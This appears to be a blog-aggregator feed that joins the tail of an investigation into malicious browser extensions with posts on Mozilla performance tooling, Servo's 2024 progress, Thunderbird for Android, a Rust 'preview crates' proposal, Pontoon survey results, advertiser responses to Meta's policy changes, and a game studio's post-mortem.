[He] works for us as a freelancer in development. Employees (including freelancers) are generally not allowed to operate publisher accounts at adindex and the account in question does not belong to [this developer]. Whether he operates extensions is actually beyond my knowledge.

I want to conclude this article with some assorted history facts:

  • The two extensions associated with MegaXT have been running remote code since at least 2021. I don’t know whether they were outright malicious from the start, this would be impossible to prove retroactively even with source code given that they simply loaded some JavaScript code into the extension context. But both extensions have reviews complaining about malicious functionality going back to 2022.
  • Darktheme for google translate and Download Manager Integration Checklist extensions both appear to have changed hands in 2024, after which they requested more privileges with an update in October 2024.
  • Download Manager Integration Checklist extension used to be called “IDM Integration Module” in 2022. There have been at least five more extensions with similar names (not counting the official one), all removed from Chrome Web Store due to “policy violation.” This particular extension was associated with a website which is still offering “cracks” that show up as malware on antivirus scans (the installation instructions “solve” this by recommending to turn off antivirus protection). But that’s most likely the previous extension owner.
  • Convert PDF to JPEG/PNG appears to have gone through a hidden ownership change in 2024, after which an update in September 2024 requested vastly extended privileges. However, the extension has reviews complaining about spammy behavior going back to 2019.

Mozilla Performance Blog: Performance Testing Newsletter (Q4 Edition)

Welcome to the latest edition of the Performance Testing Newsletter! The PerfTools team empowers engineers with tools to continuously improve the performance of Mozilla products. See below for highlights from the changes made in the last quarter.

This quarter also saw the release of perf.compare! It’s a new tool used for making comparisons between try runs (or other pushes). It is now the default comparison tool used for these comparisons and replaces the Compare View that was in use previously. Congratulations to all the folks involved in making this release happen! Feel free to reach out in #perfcompare on Matrix if there are any questions, feature requests, etc. Bugs can be filed in Testing :: PerfCompare.

Highlights from Contributors

PerfCompare

Profiler

Perftest

Highlights from Rest of the Team

Blog Posts ✍️

Contributors

If you have any questions, or are looking to add performance testing for your code component, you can find us in #perftest on Element, or #perf-help on Slack.

The Servo Blog: Servo in 2024: stats, features and donations

Two years after the renewed activity on the project we can confirm that Servo is fully back.

If we ignore the bots, in 2024 we’ve had 129 unique contributors (+143% over 54 last year), landing 1,771 pull requests (+163% over 673), and that’s just in our main repo!

Including bots, the total number of PRs merged goes up to 2,674 (+144% over 1094). From all this work, 26% of the PRs were made by Igalia, 40% by other contributors and the rest by the bots (34%). This shows how the Servo community has been growing and becoming more diverse with new actors participating actively in the project.

                                       2018    2019    2020    2021   2022   2023    2024
Merged PRs                             1,188   986     669     118    65     776     1,771
Unique contributors                    142     141     87      37     20     54      129
Average unique contributors per month  27.33   27.17   14.75   4.92   2.83   11.33   26.33

Now let’s take a look at the data and chart above, which show the evolution since 2018 in the number of merged PRs, unique contributors per year and average contributors per month (excluding bots). We can see the project is back to the numbers of 2018 and 2019, when it was being developed at full speed!

It’s worth noting that Servo’s popularity keeps growing, with many folks realizing there has been new activity on the project over the last year, and more and more people becoming interested in the project.

Servo GitHub star history chart: stars have grown continuously since 2013, now surpassing the 25,000 threshold.

During 2024 Servo has been present in 8 events with 9 talks: FOSDEM, Open Source Summit North America, Seattle Rust user meetup, GOSIM Europe, Global Software Technology Summit, Linux Foundation Europe Member Summit, GOSIM China, Ubuntu Summit.

If we focus on development, there have been many things moving forward during the year. Servo’s main dependencies (SpiderMonkey, Stylo and WebRender) have been upgraded, and the new layout engine has kept evolving, adding support for floats, tables, flexbox, fonts, etc. By the end of 2024 Servo passes 1,515,229 WPT subtests (79%). Many other new features have been under active development: WebGPU, Shadow DOM, ReadableStream, WebXR, … Servo now supports two new platforms: Android and OpenHarmony. And we have seen the first experiments with applications using Servo as a web engine (like Tauri, Blitz, QtWebView, Cuervo, Verso and Moto).

In 2024 we have raised 33,632.64 USD with donations via Open Collective and GitHub Sponsors from 500 different people and organizations. Thank you all for supporting us!

With this money we now have 3 servers that provide self-hosted runners for Linux, macOS, and Windows, reducing our build times from over an hour to under 30 minutes.

Talking about the future, the Servo TSC has been discussing the roadmap for 2025, which has been updated on the Servo wiki. We have many plans to keep Servo thriving with new features and improvements. Let’s hope for a great 2025!

Mozilla Thunderbird: VIDEO: The Thunderbird Mobile Team

The Thunderbird Mobile team are crafting the newest chapter of the Thunderbird story. In this month’s office hours, we sat down to chat with the entire mobile team! This includes Philipp Kewisch, Sr. Manager of Mobile Engineering (and long-time Thunderbird contributor), and Sr. Software Engineers cketti and Wolf Montwé (long-time K-9 Mail maintainer and developer, respectively). We talk about the journey from K-9 Mail to Thunderbird for Android, what’s new and what’s coming in the near future, and the first steps towards Thunderbird on your iOS devices!

Next month, we’ll be chatting with Laurel Terlesky, Manager of the UI/UX Design Studio! She’ll be sharing her FOSDEM talk, “Thunderbird: Building a Cross-Platform, Scalable Open-Source Design System.” It’s been a while since we’ve chatted with the design team, and it will be great to see what they’re working on.

January Office Hours: The Thunderbird Mobile Team

In June 2022, we announced that K-9 Mail would be joining the Thunderbird family, and would ultimately become Thunderbird for Android. After two years of development, the first beta release of Thunderbird for Android debuted in October 2024, shortly followed by the first stable release. Since then, over 200 thousand users have downloaded the app, and we’ve gotten some very nice reviews in ZDNet and Android Authority. If you haven’t tried us on your Android device yet, now is a great time! And if, like some of us, you’re waiting for Thunderbird to come to your iPhone or iPad, we have some exciting news at the end of our talk.

Want to know more about the Android development process and find out what’s coming soon to the app? Want the first look into our plans for Thunderbird on iOS? Let our mobile team guests provide the answers!

Watch, Read, and Get Involved

We’re so grateful to Philipp, cketti, and Wolf for joining us! We hope this video helps explain more about Thunderbird on Android (and eventually iOS), and encourages you to download the app if you haven’t already. If you’re a regular user, we hope you consider contributing code, translations, or support. And if you’re an iOS developer, we hope you consider joining our team!

VIDEO (Also on Peertube):


Niko Matsakis: Preview crates

This post lays out the idea of preview crates.1 Preview crates would be special crates released by the rust-lang org. Like the standard library, preview crates would have access to compiler internals but would still be usable from stable Rust. They would be used in cases where we know we want to give users the ability to do X but we don’t yet know precisely how we want to expose it in the language or stdlib. In git terms, preview crates would let us stabilize the plumbing while retaining the ability to iterate on the final shape of the porcelain.

Nightly is not enough

Developing large language features is a tricky business. Because everything builds on the language, stability is very important, but at the same time, there are some questions that are very hard to answer without experience. Our main tool for getting this experience has been the nightly toolchain, which lets us develop, iterate, and test features before committing to them.

Because the nightly toolchain comes with no guarantees at all, however, most users who experiment with it do so lightly, just using it for toy projects and the like. For some features, this is perfectly fine, particularly syntactic features like let-else, where you can learn everything you need to know about how it feels from a single crate.

Nightly doesn’t let you build a fledgling ecosystem

Where nightly really fails us though is the ability to estimate the impact of a feature on a larger ecosystem. Sometimes you would like to expose a capability and see what people build with it. How do they use it? What patterns emerge? Often, we can predict those patterns in advance, but sometimes there are surprises, and we find that what we thought would be the default mode of operation is actually kind of a niche case.

For these cases, it would be cool if there were a way to issue a feature in “preview” mode, where people can build on it, but it is not yet released in its final form. The challenge is that if we want people to use this to build up an ecosystem, we don’t want to disturb all those crates when we iterate on the feature. We want a way to make changes that lets those crates keep working until the maintainers have time to port to the latest syntax, naming, or whatever.

Editions are closer, but not quite right

The other tool we have for correcting mistakes is editions. Editions let us change what syntax means and, because editions are opt-in, all existing code continues to work.

Editions let us fix a great many things to make Rust more self-consistent, but they carry a heavy cost. They force people to relearn how things in Rust work. They make books outdated. This price is typically too high for us to ship a feature knowing that we are going to change it in a future edition.

Let’s give an example

To make this concrete, let's take a specific example. The const generics team has been hard at work iterating on the meaning of const trait and in fact there is a pending RFC that describes their work. There's just one problem: it's not yet clear how it should be exposed to users. I won't go into the rationale for each choice, but suffice it to say that there are a number of options under consideration. All of the following have been proposed as the way to say "a function that can be executed at compilation time which will call T::default":

  • const fn compute_value<T: ~const Default>()
  • const fn compute_value<T: const Default>()
  • const fn compute_value<T: Default>()

At the moment, I personally have a preference between these (I’ll let you guess), but I figure I have about… hmm… 80-90% confidence in that choice. And what’s worse, to really decide between them, I think we have to see how the work on async proceeds, and perhaps also what kinds of patterns turn out to be common in practice for const fn. This stuff is difficult to gauge accurately in advance.

Enter preview crates

So what if we released a crate rust_lang::const_preview? In my dream world, this is released on crates.io, using the namespaces described in [RFC #3243](https://rust-lang.github.io/rfcs/3243-packages-as-optional-namespaces.html). Like any crate, const_preview can be versioned. It would expose exactly one item, a macro const_item that can be used to write const functions that have const trait bounds:

const_preview::const_item! {
    const fn compute_value<T: ~const Default>() {
        // as `~const` is what is implemented today, I'll use it in this example
    }
}

Internally, this const_item! macro can make use of internal APIs in the compiler to parse the contents and deploy the special semantics.

Releasing v2.0

Now, maybe we use this for a while, and we find that people really don’t like the ~, so we decide to change the syntax. Perhaps we opt to write const Default instead of ~const Default. No problem, we release a 2.0 version of the crate and we also rewrite 1.0 to take in the tokens and invoke 2.0 using the semver trick.

const_preview::const_item! {
    const fn compute_value<T: const Default>() {
        // in the 2.0 crate, the bound is written `const` rather than `~const`
    }
}
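
As a rough sketch of what the rewritten 1.0 crate could look like under the semver trick (the dependency rename and the forwarding details here are my assumptions, not a settled design), the old macro would mostly just hand its tokens to the 2.0 implementation:

// Hypothetical const_preview 1.x after the 2.0 release (the "semver trick"):
// it depends on the 2.0 crate and forwards the tokens it receives.
//
// [dependencies]                                    (sketch of 1.x's Cargo.toml)
// const_preview_v2 = { package = "const_preview", version = "2" }

#[macro_export]
macro_rules! const_item {
    ($($tokens:tt)*) => {
        // The 2.0 implementation (or the compiler machinery behind it) is
        // assumed to still accept the old `~const` spelling and translate it,
        // so crates written against 1.0 keep compiling unchanged.
        ::const_preview_v2::const_item! { $($tokens)* }
    };
}

That way, crates depending on 1.0 and crates depending on 2.0 end up sharing a single implementation, which is exactly the property the semver trick is meant to give us.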

Integrating into the language

Once we decide we are happy with const_item! we can merge it into the language proper. The preview crates are deprecated and simply desugar to the true language syntax. We all go home, drink non-fat flat whites, and pat ourselves on the back.

User-based experimentation

One thing I like about the preview crates is that then others can begin to do their own experiments. Perhaps somebody wants to try out what it would be like if T: Default meant const by default–they can readily write a wrapper that desugars to const_preview::const_item and try it out. And people can build on it. And all that code keeps working once we integrate const functions into the language "for real", it just looks kinda dated.
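
To make that concrete, here is a minimal sketch of such a user-side wrapper, assuming the hypothetical const_preview crate from above; the single macro arm handles only one simple function shape and is purely illustrative:

// Hypothetical experiment built on top of const_preview: a wrapper macro in a
// user crate that rewrites a plain `T: Trait` bound into `T: ~const Trait`, so
// its callers can act as if const-ness were the default. A real experiment
// would need a much broader rewrite than this single pattern.
#[macro_export]
macro_rules! const_by_default {
    (const fn $name:ident<$t:ident: $bound:path>() $body:block) => {
        ::const_preview::const_item! {
            const fn $name<$t: ~const $bound>() $body
        }
    };
}

// Usage sketch: expands to the const_preview form shown earlier.
// const_by_default! {
//     const fn compute_value<T: Default>() {
//         // ...
//     }
// }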

Frequently asked questions

Why else might we use previews?

Even if we know the semantics, we could use previews to stabilize features where the user experience is not great. I’m thinking of Generic Associated Types as one example, where the stabilization was slowed because of usability concerns.

What are the risks from this?

The previous answer hints at one of my fears… if preview crates become a widespread way for us to stabilize features with usability gaps, we may accumulate a very large number of them and then never move those features into Rust proper. That seems bad.

Shouldn’t we just make a decision already?

I mean…maybe? I do think we are sometimes very cautious. I would like us to get better at leaning on our judgment. But I also see that sometimes there is a tension between "getting something out the door" and "taking the time to evaluate a generalization", and it's not clear to me whether this tension is inherent or just an artifact of the way we do business.

But would this actually work? What’s in that crate and what if it is not matched with the right version of the compiler?

One very special thing about libstd is that it is released together with the compiler and hence is able to co-evolve, making use of internal APIs that are unstable and change from release to release. If we want to put this crate on crates.io, it will not be able to co-evolve in the same way. Bah. That's annoying! But I figure we could still handle it by having the preview functionality exposed by crates in the sysroot that ship along with the compiler. These crates would not be directly usable except by our blessed crates.io crates, but they would basically just be shims that expose the underlying stuff. We could of course cut out the middleman and just have people use those sysroot crates directly, but I don't like that as much because it's less obvious and because we can't as easily track reverse dependencies on crates.io to evaluate usage.

A macro seems heavyweight! What other options have you considered?

I also considered the idea of having p# keywords (“preview”), so e.g.

#[allow(preview_feature)]
p#const fn compute_value<T: p#const Default>() {
    // works on stable
}

Using a p# keyword would fire off a lint (preview_feature) that you would probably want to allow.

This is less intrusive, but I like the crate idea better because it allows us to release a v2.0 of the p#const keyword.

What kinds of things can we use preview crates for?

Good question. I'm not entirely sure. It seems like APIs that require us to define new traits and other items would make it a bit tricky to maintain the total interoperability I think we want. Tools like trait aliases etc. (which we need for other reasons) would help.

Who else does this sort of thing?

Ember has formalized this “plumbing first” approach in their version of editions. In Ember, from what I understand, an edition is not a “time-based thing”, like in Rust. Instead, it indicates a big shift in paradigms, and it comes out when that new paradigm is ready. But part of the process to reaching an edition is to start by shipping core APIs (plumbing APIs) that create the new capabilities. The community can then create wrappers and experiment with the “porcelain” before the Ember crate enshrines a best practice set of APIs and declares the new Edition ready.

Java has a notion of preview features, but they carry no semver-like guarantee that they will stick around.

I’m not sure who else!

Could we use decorators instead?

Usability of decorators like #[const_preview::const_item] is better, particularly in rust-analyzer. The tricky bit there is that decorators can only be applied to valid Rust syntax, so it implies we'd need to extend the parser to accept things like ~const forever, whereas I might prefer to have that complexity isolated to the const_preview crate.
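
For reference, here is roughly what that decorator (attribute macro) form would look like; the attribute path is the hypothetical one from this post, and the point is that the item under the attribute has to parse as ordinary Rust first:

// Hypothetical attribute-macro form of the same idea. Because an attribute can
// only be attached to an item the parser already accepts, `~const` would have
// to become permanently valid surface syntax, rather than a detail hidden
// inside the const_preview crate.
#[const_preview::const_item]
const fn compute_value<T: ~const Default>() {
    // ...
}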

So is this a done deal? Is this happening?

I don't know! People often think that because I write a blog post about something it will happen, but this is currently just in the "early ideation" stage. As I've written before, though, I continue to feel that we need some kind of "middle state" for our release process (see e.g. this blog post, Stability without stressing the !@#! out), and I think preview crates could be a good tool to have in our toolbox.


  1. Hat tip to Yehuda Katz and the Ember community, Tyler Mandry, Jack Huey, Josh Triplett, Oli Scherer, and probably a few others I've forgotten with whom I discussed this idea. Of course, anything you like they came up with; everything you hate was my addition. ↩︎

Mozilla Localization (L10N): 2025 Pontoon survey results

The results from the 2025 Pontoon survey are in and the 3 top-voted features we commit to implement are:

  1. Add ability to preview Fluent strings in the editor (258 votes).
  2. Keep unsaved translations when navigating to other strings (252 votes).
  3. Hint at any available variants when referencing a message (229 votes).

The remaining features ranked as follows:

  1. Add virtual keyboard with special characters to the editor (226 votes).
  2. Link project names in Concordance search results to corresponding strings (223 votes).
  3. Add a batch action to pretranslate a selection of strings (218 votes).
  4. Add ability to edit and remove comments (216 votes).
  5. Enable use of generic machine translation engines with pretranslation (209 votes).
  6. Add ability to report comments and suggestions for abusive content (193 votes).
  7. Add “Copy translation from another locale as suggestion” batch action (186 votes).

We thank everyone who dedicated their time to share valuable responses and suggest potential features for us to consider implementing!

Each user could give each feature 1 to 5 votes. A total of 154 Pontoon users participated in the survey, 68 of whom voted on all features. The number of participants is lower than in past years, since we only reached out to users who explicitly opted in to email updates.

We look forward to implementing these new features and working towards a more seamless and efficient translation experience with Pontoon. Stay tuned for updates!

Don Marti: time to sharpen your pencils, people

Mariana Olaizola Rosenblat covers How Meta Turned Its Back on Human Rights for Tech Policy Press. Zuckerberg announced that his company will no longer work to detect abuses of its platforms other than high-severity violations of content policy, such as those involving illicit drugs, terrorism, and child sexual exploitation. The clear implication is that the company will no longer strive to police its platform against other harmful content, including hate speech and targeted harassment.

Sounds like a brand-unsafe environment. So is another rush of advertiser boycott stories coming? Not this time. Lara O’Reilly reports that brand safety has recently become a political hot potato and been a flash point for some influential, right-leaning figures. In uncertain times, marketing decision-makers are keeping a low profile. Most companies aren’t really set up to take on the open-ended security risk of coming out against hate speech by users with friends in high places. According to the Fraternal Order of Police, the January 6 pardons send a dangerous message, and that message is being heard in marketing departments. The CMOs who boycotted last time are fully aware that stochastic terrorism is a thing, and that rage stories about companies spread quickly in Facebook groups and other extremist media. If an executive makes the news for pulling ads from Meta, they would be putting employees at risk from lone, deniable attacks. So instead of announcing a high-profile boycott, marketers are more likely to follow the example of Federal employees and do the right thing, by the book, and quietly.

Fortunately, big advertisers got some lower-stakes practice with the X (former Twitter) situation. Instead of either (1) staying on there and putting the brand at risk of being associated with material copied out of Henry Ford’s old newspaper or (2) risking getting snarled up in a lawsuit for pulling the X ads entirely, brands got the best of both by cutting way back on the actual money without dropping X entirely or saying much one way or the other.

And it’s possible for advertisers to reduce support for Meta without making a stink or drawing fire. Fortunately, Meta ads are hella expensive, and results can be unrealistic and unsustainable. Like all the Big Tech companies these days, Meta is coping with a slowdown in innovation by tweaking the ad rules to capture more revenue from existing services. As Jakob Nielsen pointed out back in 2006, in Search Engines as Leeches on the Web, ad platforms can even capture the value created by others. A marketer doesn’t have to shout ¡No Pasarán! or anything—just sharpen your best math pencil, quietly go through the numbers, spot something that looks low-ROAS or fraudulent in the Meta column, tweak the budget, repeat. If users can dial down Meta, so can marketers. (Update: Richard Kirk writes, Brands could be spending three times too much on social. You read that right. Read the math, do the math.) And if Meta comes out with something new and risky like the adfraud in the browser thing, Privacy-Preserving Attribution, it’s easy to use the fraud problem as the reason not to do it—you don’t have to stand up and talk politics at work.

From the user side

It’s not that hard to take privacy measures that result in less money for Big Tech. Even if you can’t quit Meta entirely, some basic tools and settings can make an impact, especially if you use both a laptop and a phone, not just a phone. With a few minutes of work, an individual in the USA can, in effect, fine the surveillance business about $50/month.

My list of effective privacy tips is prioritized by how much I think they’ll cost the surveillance business per minute spent. A privacy tips list for people who don’t like doing privacy tips but also don’t like creepy oligarchs. (As they say in the clickbait business, number 9 will shock you: if you get your web browser info from TV and social media, you probably won’t guess which browsers have built-in surveillance and/or fraud features.) That page also has links to more intensive privacy advice for those who want to get into it.

A lawyer question

As an Internet user, I realize I can’t get to Meta surveillance neutral just with my own privacy tools and settings. For the foreseeable future, companies are going to be doing server-to-server tracking of me with Meta CAPI.

So in order to get to a rough equivalent of not being surveilled, I need to balance out their actual surveillance by introducing some free speech into the system. (And yes, numbers can be speech. O, the Tables tell!) So what I’d like to do is write a surrogate script (that can be swapped in by a browser extension in place of the real Meta Pixel, like the surrogate scripts uBlock Origin uses) to enable the user to send something other than valid surveillance data. The user would configure what message the script would send. The surrogate script would then encode the message and pass it to Meta in place of the surveillance data sent by the original Meta script. There is a possible research angle to this, since I think that in general, reducing ad personalization tends to help people buy better products and services. An experiment would probably show that people who mess with cross-context surveillance are happier with their purchases than those who allow surveillance. Releasing a script like that is the kind of thing I could catch hell for, legally, so I’m going to wait to write it until I can find a place to host it and a lawyer to represent me. Anyone?

Related

Big Tech platforms: mall, newspaper, or something else?

Sunday Internet optimism

Bonus links

After Big Social. Dan Phiffer covers the question of where to next. I am going into this clear-eyed; I’m going to end up losing touch with a lot of people. For many of my contacts, Meta controls the only connection we have. It’s a real loss, withdrawing from communities that I’ve built up over the years (or decades in the case of Facebook). But I’m also finding new communities with different people on the networks I’m spending more time in.

No Cookies For You!: Evaluating The Promises Of Big Tech's 'Privacy-Enhancing' Techniques. Kirsten Martin, Helen Nissenbaum, and Vitaly Shmatikov cover the problems with privacy-enhancing Big Tech features. (Not everything with privacy in its name is a privacy feature. It's like open, I guess.)

Adrian Gaudebert: 3 years of intense learning - The Dawnmaker Post-mortem

It's been 3 years since I started working on Dawnmaker full-time with Alexis. The creation of our first commercial game coincided with the creation of Arpentor Studio, our company. I've shared a lot of insights along the way on this blog, from how we did our first market research (which was incredibly wrong) to how much we made with our game (look at the difference between the two, it's… interesting). I wrote a pretty big piece where I explained how we built Arpentor Studio. I wrote a dozen smaller posts about the development of Dawnmaker. And I shared a bunch of my feelings, mistakes and successes in my yearly State of the Adrian posts (in French only, sorry).

But today, I want to take a step back and give a good look at these last 3 years. It's time for the Dawnmaker post-mortem, where I'm going to share what I believe we did well, what we did wrong, and what I've learned along the way. Because Dawnmaker and Arpentor Studio are so intertwined, I'm inevitably going to talk about the studio as well, but I think it makes sense. Let's get started!

What we did

Let's get some context first. Dawnmaker is a solo strategy game, mixing city building and deckbuilding to create a board game-like experience. It was released in July 2024 on Steam and itch.io. The team consisted of 2 full-time people, with occasional help from freelancers. My associate Alexis took care of everything related to graphics, and I did the programming and game design of the game. If you're interested in how much the game sold, I wrote a blog post about this: 18 days of selling Dawnmaker.

Dawnmaker capsule

I created the very first prototype of what would become Dawnmaker back in the summer of 2021, but we only started working on the game full-time in December of that year. We joined a local incubator in 2022, which kind of shook our plans: we spent a significant portion of our time working on administrative things around the game, like making pitch decks and funding briefs. We had to create a company earlier than we had planned in order to ask for public funding. So in 2022 we only spent about half our time actually developing the game. In 2023, after being rejected for our main source of funding, we shrank our ambitions and focused on just making the game. We still spent time improving our pitch deck and contacted some publishers, but never managed to secure a deal. In early 2024, we decided to self-publish, started our Steam page and worked on promoting the game while polishing what we had.

Because we never found a publisher, we never had the money to do the production phase of Dawnmaker. That means the game shipped with about half the content we wanted it to have. Here are my definitions of the different phases of a game project, as I'll refer to them later on in this article:

  1. Ideation — The phase where we are defining the key concepts of the game we want to make. There's some early prototyping there, as well as research. The goal is to have a clear picture of what we want to build.
  2. Pre-production — The phase where we validate what the core of the game is, that it is fun, and that we will be able to actually deliver it. It can be cut down into three steps: prototyping, pre-production and vertical slice. In prototyping we validate the vision of the game. In pre-production (yes, it's the same name as the phase, but that's what I was taught) we build our production pipeline. During the vertical slice, we validate that the pipeline works and finalize the main systems of the game.
  3. Production — The phase where we build the content of the game. This phase is supposed to be one that can be planned very precisely, because the pre-production has supposedly removed almost all the unknowns.
  4. Post-production — The phase where we polish our game and take it through the finish line.

Now that you have some context, let's get into the meat of this article!

What we did right

Let's start this post-mortem on a positive note, and list the things that I believe we did well. First and foremost, we actually shipped a game! Each game that comes out is a little miracle, and we succeeded there. We kept our vision, we pushed it as far as we could, and we did not give up. Bravo us!

Good game quality

What's more, our game has been very well received: at the time of writing, we have a 93% positive review ratio on Steam, from 103 reviews. I am of course stoked that Dawnmaker was liked by that many reviewers. I think there are 3 main reasons why we had such positive reviews (other than the game being decently fun, of course):

  1. We kept a demo up at all times, even after the release, meaning that tentative customers could give it a try before buying. If they didn't like the demo, they didn't buy the game — not good for us — but then they were not disappointed by a product they bought — good for them and for our reviews!
  2. We were speaking to a very small niche, but provided something that was good for them. The niche is a weird intersection of deckbuilding, city building and board game fans. It was incredibly difficult to find and talk to, probably because it is, as I said, very small, but we made something that worked very well for those players.
  3. We under-priced the game aggressively (at $9.99) to lower the players' expectations. That actually transpired in the reviews, where a few people mentioned that the game had flaws, but they tolerated them because of the price tag. (Note: the game has since been moved up to a $14.99 price point by our new publisher.)

Of course, had the game been bad, we would not have had those reviews at all. So it goes to show that Dawnmaker is a fine game. For all its flaws, it is fun to play. I've played it a lot — as I guess all game creators do with their creation — and it took me a while to get bored with it. The median playtime on Steam is 3 hours and 23 minutes, with an average playtime of 8 hours and 17 minutes. Here's a stat that blows my mind: at the time of writing, 175 people (about 10% of our players) have played Dawnmaker for more than 20 hours. At least 15 people played it for more than 50 hours. I know this is far from the life-devouring monsters that are out there, like Civilization, Skyrim, Minecraft or GTA, but for our humble game and for me, that's incredible to think about.

So, we made a fun game. I think we succeeded there by just spending a lot of time in pre-production. Truth be told, we spent about 2 years in that phase, only 6 months in post-production, and we did not really do a real production phase. For 2 years, we were testing the game and making deep changes to its core, iterating until we found the best version of this game we could. Mind you, 2 years was way too long a time, and I'll get back to that in the failures section. But I believe the reason why Dawnmaker was enjoyed by our players is because we took that time to improve it.

Lesson learned

Make good games?

The art of the game was also well received, and here again I think time was the key factor. It took a long time to land on the final art direction. There was a point where the game had a 3D board, and it was… not good. I think one of our major successes, from a production point of view, was to pivot to a 2D board. That simplified a lot of things in terms of programming and performance, and made us land on that much, much better art style. It took a long time but we got there.

Screenshot of the first prototype of Dawnmaker <figcaption>The first prototype of Dawnmaker, which had sound for some reason…</figcaption>

There's one last aspect that I think mattered in the success of the game, and for which I am particularly proud: the game had very few bugs upon release, and none were blocking. I've achieved that by prioritizing bug fixing at all times during the development of the game. I consider that at any point in time, and with very few exceptions, fixing a known bug is higher priority than anything else. Of course this is easier done when there is a single programmer, who knows the entire code base, but I'm convinced that, if you want to ship bug-free products, bug fixing must not be an afterthought, a thing that you do in post-production. If you keep a bug-free game at all times during development, chances are very high that you'll ship a bug-free game!

Lesson learned

Keeping track of bugs and fixing them as early as possible makes your life easier when you're nearing release, because you don't have to spend time chasing bugs in code that you wrote months or years before. Always reserve time for bug fixing in your planning!

Custom tooling

Speaking of programming, a noticeable part of my time was spent creating a custom tool to handle the game's data. Because we're using a custom tech stack, and not a generic game engine, we did not have access to pre-made tooling. But, since I was in control of the full code of the game, I have been able to create a tool that I'm very happy with.

First a little bit of context: Dawnmaker is coded with Web technologies. What it means is that it's essentially a website, or more specifically, a web app. Dawnmaker runs in a browser. Heck, for most of the development of the game, we did our playtests in browsers! That was super convenient: you want someone to test your game? They can open their favorite browser to the URL of the game, and tada, they can play! No need to download or install anything, no need to worry about updates, they always have the latest version of the game there.

Because our game is web-based, I was able to create a content editor, also web-based, that could run the game. So we have this editor that is a convenient way to edit a database, where all the data about Dawnmaker sits. The cool thing is that, when one of us would make a change to the data, we could click a button right there in the editor, and immediately start playing the game with the changes we just made. No need to download data, build locally, or such cumbersome steps. One click, and you're in the game, with all the debug tools and conveniences you need. Another click, and you're back to the editor, ready to make further changes.

Screenshot of the Dawnmaker content editor <figcaption>Screenshot of the Dawnmaker content editor</figcaption>

That tool evolved over time to also handle the graphical assets related to our buildings. Alexis was able to upload, for each building, its illustration and all the elements composing its tile. I added a spritesheet system that could be used in buildings as animations, with controls to order layers, scale and position elements, and even change the tint of sprites.

Lesson learned

Tooling is an investment that can pay double: it makes you and your team go faster, and can be reused in future projects. Do not make tools for the sake of making tools of course. Do it only when you know that it will save you time in the end. But if you're smart about it, it can really pay off in the long run.

Long-term company strategy

There's one last thing I believe we did well that I want to discuss, and it's related to our company strategy. Very early on in the creation of Arpentor Studio, we thought about our long-term strategy: what does our road to success look like? Where do we want to be in 5 to 10 years? Our answer was that we wanted to be known for making strategy games (sorry, lots of strategies in this paragraph) that were deep, both in mechanics and meaning. The end game would be to be in a position to realistically make my dream competitive card game — something akin to Magic: the Gathering, Hearthstone or Legends of Runeterra.

What we did well is that we did not start at the end, but instead drafted a plan to gather experience, knowledge and money, to put ourselves in a place where we would be confident about launching such an ambitious project. We aimed to start by making a solo game, to avoid the huge complexities of handling multiplayer. We aimed to make a simple strategy game, too, but there we missed our goal, for the game we made was way too original and complex. But still, we managed to stay on track: no multiplayer, simple 2D (even though we went 3D for half a year), and mechanics that were not as heavy as they could have been.

We failed on the execution of the plan, and I'll expand on that later in this post, but we did take the time to make a plan and that's a big success in my opinion.

Lesson learned

Keep things as simple as possible for your first games! We humans have a tendency to make things more complex as we go, increasing the scope, adding cool features and so on. That can be a real problem down the line if you're trying to build a sustainable business. Set yourself some hard constraints early on (for example, no 3D, no narration, no NPCs, etc.) and keep to them to make sure you can finish your game in a timely manner.

What we did wrong

It's good to recognize your successes, so that you can repeat them, but it's even more important to take a good look at your failures, so that you can avoid repeating them. We made a lot of mistakes over these past 3 years, both related to Dawnmaker and to Arpentor Studio. I'll start by focusing on the game's production, then move on to the game itself to finally discuss company-related mistakes.

Production mistakes

Scope creep aka "the Nemesis of Game Devs"

The scope of Dawnmaker exploded during its development. It was initially supposed to be a game that we wanted to make in about a year. We ended up working on it for more than two and a half years instead! There are several reasons why the scope got so out of control.

Screenshot of Dawnmaker, July 2022 <figcaption>Dawnmaker in July 2022 — called "Cities of Heksiga" at the time</figcaption>

The first reason is that we were not strict enough in setting deadlines and respecting them. During our (long) preproduction phase, we would work on an iteration of the game, then test it, then realize that it wasn't as good as we wanted it to be, and thus start another iteration. We did this for… a year and a half? Of course, working on a game instead of smaller prototypes didn't help in reaching the right conclusions faster. But we also failed to make a long-term plan, with hard dates for the key milestones of the game's development. We were thinking that it was fine, that the game would be better if we spent more time on it. That is definitely true. What we did not account for was that the game would not sell significantly better just because we worked on it more. I'll get back to that when discussing the company strategy.

Lesson learned

Setting deadlines and respecting them is one of the key abilities to master for shipping games and making money with them. Create a budget and assign delivery dates to key milestones. Revisit these often, to make sure you're on track. If not, you need to reassess your situation as soon as possible. Cut the scope of your work or extend your deadlines, but make sure you adapt the budget and that you have a good understanding of the consequences of making those changes.

The second reason the scope exploded is that we were lured into thinking that getting money was easy, especially public funding, and that we should ask for as much money as we could. To do that, we had to increase the scope of what we were presenting, in the hope that we would receive big money, which would enable other sources of money, and allow us to make a bigger game. The problem we faced was that we shifted our actual work to that new plan, that bigger scope, long before we knew if we would get the money or not. And so instead of working on a 1-year production, insidiously we found ourselves working on a 2 to 3-year production. And then of course, we did not get the money we asked for, and were on a track that required a few hundred thousand euros to fund, with just our personal savings to do it.

I think the trick here is to have two different plans for two different games. Their core is the same, but one is the game that you can realistically make without any sort of funding, and the other is what you could do if you were to receive the money. But we should never start working on the "dream" game until the money is in our bank account. I think that's a terribly difficult thing to do — at least it was for me — and a big trap of starting a game production that relies on external funding.

Lesson learned

Never spend money you do not have. Never start down a path until you're sure you will be able to execute it entirely.

The third reason why the scope got out of control is a bit of a consequence of the first two: we saw our game as bigger than it ended up being, and did not focus enough on the strength of our core gameplay. We were convinced that we needed to have a meta-progression, a game outside the game, and struggled a lot to figure out what that should be. And as I discuss later in this article, I think we failed to do it: our meta-progression is too shallow and doesn't improve the core of the game.

Looking back, I remember conversations we had where we justified the need for this work with the scope of the game, with the price we wanted to sell the game for, and thus with the expectations of our future players. The reasoning was: this is a $20 game, players will expect a lot of replayability, so we need a meta-progression that enables it. I think that was a valid line of thought, if only we had actually been making a $20 game. In the end, Dawnmaker was sold for $10. Had we realigned earlier, had we taken a real step back after we realized that we were not getting any significant funding, maybe we would have seen this. For a $10 game, we did not need such a complex meta-progression system. We could have focused more on developing the core of the game, building more content and gameplay systems, and landed on a much simpler progression.

Lesson learned

Things change during the lifetime of a game. Take a step back regularly to ask yourself if the assumptions you made earlier are still valid today.

Prototyping the wrong way

